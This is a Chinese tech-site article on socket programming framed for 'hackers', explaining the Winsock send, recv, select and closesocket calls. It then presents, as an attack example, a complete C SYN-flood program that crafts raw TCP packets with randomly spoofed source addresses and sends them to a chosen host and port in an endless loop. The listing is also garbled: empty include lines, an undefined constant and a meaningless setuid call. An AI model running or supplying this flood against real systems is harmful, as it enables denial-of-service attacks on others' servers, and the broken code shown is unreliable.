加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

“黑客”深度学习之“Socket网络编程详解”

发布时间:2019-02-14 08:11:48 所属栏目:建站 来源:信息安全我来讲你来听
导读:大家都是知道在黑客网络攻防中,熟悉网络通信原理很重要,之前我也写过相关文章,只要了解通信过程,就可以利用过程中存在的漏洞进行攻防,那么在实现攻防的时候,作为一名黑客一定要学会网络编程,而网络编程中很重要的一个环节就是Socket的学习和使用!

send()调用用于s指定的已连接的数据报或流套接字上发送输出数据,格式如下:

  1. [cpp]  
  2. int PASCAL FAR send(SOCKET s, const char FAR *buf, int len, int flags);  

参数s为已连接的本地套接字描述符。buf 指向存有发送数据的缓冲区的指针,其长度由len 指定。flags 指定传输控制方式,如是否发送带外数据等。如果没有错误发生,send()返回总共发送的字节数。否则它返回SOCKET_ERROR。

recv()调用用于s指定的已连接的数据报或流套接字上接收输入数据,格式如下:

  1. [cpp]  
  2. int PASCAL FAR recv(SOCKET s, char FAR *buf, int len, int flags);  

参数s 为已连接的套接字描述符。buf指向接收输入数据缓冲区的指针,其长度由len 指定。flags 指定传输控制方式,如是否接收带外数据等。如果没有错误发生,recv()返回总共接收的字节数。如果连接被关闭,返回0。否则它返回SOCKET_ERROR。

输入/输出多路复用──select():

select()调用用来检测一个或多个套接字的状态。对每一个套接字来说,这个调用可以请求读、写或错误状态方面的信息。请求给定状态的套接字集合由一个fd_set结构指示。在返回时,此结构被更新,以反映那些满足特定条件的套接字的子集,同时, select()调用返回满足条件的套接字的数目,其调用格式如下:

  1. [cpp]  
  2. int PASCAL FAR select(int nfds, fd_set FAR * readfds, fd_set FAR * writefds, fd_set FAR * exceptfds, const struct timeval FAR * timeout);  

参数nfds指明被检查的套接字描述符的值域,此变量一般被忽略。

参数readfds指向要做读检测的套接字描述符集合的指针,调用者希望从中读取数据。参数writefds 指向要做写检测的套接字描述符集合的指针。exceptfds指向要检测是否出错的套接字描述符集合的指针。timeout指向select()函数等待的最大时间,如果设为NULL则为阻塞操作。select()返回包含在fd_set结构中已准备好的套接字描述符的总数目,或者是发生错误则返回SOCKET_ERROR。

5. 关闭套接字──closesocket()

closesocket()关闭套接字s,并释放分配给该套接字的资源;如果s涉及一个打开的TCP连接,则该连接被释放。closesocket()的调用格式如下:

  1. [cpp]  
  2. BOOL PASCAL FAR closesocket(SOCKET s);  

参数s待关闭的套接字描述符。如果没有错误发生,closesocket()返回0。否则返回值SOCKET_ERROR。

四、黑客如何利用socket编程实现网络攻击

1. DDOS攻击实例

  1. #include  
  2.  #include  
  3.  #include  
  4.  #include  
  5.  #include  
  6.  #include  
  7.  #include  
  8.  #include  
  9.  #include 
  10.  void send_tcp(int sockfd,struct sockaddr_in *addr);  
  11.  unsigned short check_sum(unsigned short *addr,int len);  
  12.   
  13.  int main(int argc,char **argv)  
  14.  {  
  15.  int DESTPORT;  
  16.  int sockfd;  
  17.  struct sockaddr_in addr;  
  18.  struct hostent *host;  
  19.  int on=1;  
  20.   
  21.  if(argc != 3)  
  22.  {  
  23.  fprintf(stderr,"Usage:dos host port./n");  
  24.  exit(1);  
  25.  }  
  26.  DESTPORT = atoi(argv[2]);  
  27.  printf("no is attacking host %s with port %d../n",argv[1],DESTPORT);  
  28.  //printf("ok started!/n");  
  29.  bzero(&addr,sizeof(struct sockaddr_in));  
  30.  addr.sin_family=AF_INET;  
  31.  addr.sin_port=htons(DESTPORT);  
  32.   
  33.  if(inet_aton(argv[1],&addr.sin_addr)==0)  
  34.  {  
  35.  host=gethostbyname(argv[1]);  
  36.  if(host==NULL)  
  37.  {  
  38.  fprintf(stderr,"HostName Error:%s/n/a",hstrerror(h_errno));  
  39.  exit(1);  
  40.  }  
  41.  addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);  
  42.  }  
  43.   
  44.  /**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/  
  45.   
  46.  sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);  
  47.  if(sockfd<0)  
  48.  {  
  49.  fprintf(stderr,"Socket Error:%s/n/a",strerror(errno));  
  50.  exit(1);  
  51.  }  
  52.  /******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/  
  53.   
  54.  setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));  
  55.   
  56.  /**** 没有办法,只用超级护用户才可以使用原始套接字 *********/  
  57.  setuid(getpid());  
  58.   
  59.  /********* 发送炸弹了!!!! ****/  
  60.  send_tcp(sockfd,&addr);  
  61.  }  
  62.   
  63.   
  64.   
  65.  /******* 发送炸弹的实现 *********/  
  66.  void send_tcp(int sockfd,struct sockaddr_in *addr)  
  67.  {  
  68.  char buffer[100]; /**** 用来放置我们的数据包 ****/  
  69.  struct ip *ip;  
  70.  int i;  
  71.  struct tcphdr *tcp;  
  72.  int head_len;  
  73.   
  74.  /******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/  
  75.   
  76.  head_len=sizeof(struct ip)+sizeof(struct tcphdr);  
  77.   
  78.  bzero(buffer,100);  
  79.   
  80.   
  81.  /******** 填充IP数据包的头部,还记得IP的头格式吗? ******/  
  82.  ip=(struct ip *)buffer;  
  83.  ip->ip_v=IPVERSION; /** 版本一般的是 4 **/  
  84.  ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/  
  85.  ip->ip_tos=0; /** 服务类型 **/  
  86.  ip->ip_len=htons(head_len); /** IP数据包的长度 **/  
  87.  ip->ip_id=0; /** 让系统去填写吧 **/  
  88.  ip->ip_off=0; /** 和上面一样,省点时间 **/  
  89.  ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/  
  90.  ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/  
  91.  ip->ip_sum=0; /** 校验和让系统去做 **/  
  92.  ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/  
  93.   
  94.  /******* 开始填写TCP数据包 *****/  
  95.  tcp=(struct tcphdr *)(buffer +sizeof(struct ip));  
  96.  tcp->source=htons(LOCALPORT);  
  97.  tcp->dest=addr->sin_port; /** 目的端口 **/  
  98.  tcp->seq=random();  
  99.  tcp->ack_seq=0;  
  100.  tcp->doff=5;  
  101.  tcp->syn=1; /** 我要建立连接 **/  
  102.  tcp->check=0;  
  103.   
  104.   
  105.  /** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/  
  106.  while(1)  
  107.  {  
  108.  /** 你不知道我是从那里来的,慢慢的去等吧! **/  
  109.  ip->ip_src.s_addr=random();  
  110.   
  111.  /** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */  
  112.  /** 下面这条可有可无 */  
  113.  tcp->check=check_sum((unsigned short *)tcp,  
  114.  sizeof(struct tcphdr));  
  115.  sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));  
  116.  }  
  117.  }  
  118.   
  119.  /* 下面是首部校验和的算法,偷了别人的 */  
  120.  unsigned short check_sum(unsigned short *addr,int len)  
  121.  {  
  122.  register int nleft=len;  
  123.  register int sum=0;  
  124.  register short *w=addr;  
  125.  short answer=0;  
  126.   
  127.  while(nleft>1)  
  128.  {  
  129.  sum+=*w++;  
  130.  nleft-=2;  
  131.  }  
  132.  if(nleft==1)  
  133.  {  
  134.  *(unsigned char *)(&answer)=*(unsigned char *)w;  
  135.  sum+=answer;  
  136.  }  
  137.   
  138.  sum=(sum>>16)+(sum&0xffff);  
  139.  sum+=(sum>>16);  
  140.  answer=~sum;  
  141.  return(answer);  
  142.  } 

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读